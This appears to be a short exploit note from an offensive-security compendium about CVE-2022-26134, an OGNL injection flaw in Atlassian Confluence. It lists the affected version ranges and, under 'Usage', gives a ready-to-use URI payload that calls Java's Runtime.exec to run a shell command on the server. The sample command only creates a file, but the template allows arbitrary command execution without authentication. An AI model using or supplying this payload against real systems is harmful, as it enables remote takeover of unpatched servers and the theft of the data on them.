killchain-compendium/Exploits/Java/Confluence OGNL.md

558 B

CVE-2022-26134

  • NIST CVE-2022-26134
  • Confluence versions:
    • 1.3.0 to 7.4.17
    • 7.13.0 to 7.13.7
    • 7.14.0 to 7.14.3
    • 7.15.0 to 7.15.2
    • 7.16.0 to 7.16.4
    • 7.17.0 to 7.17.4
    • 7.18.0 to 7.18.1
  • Object Graph Navigation Language (OGNL)

Usage

  • Payload is a GET request which is set via the URI
 ${@java.lang.Runtime@getRuntime().exec("touch /tmp/exploit")}/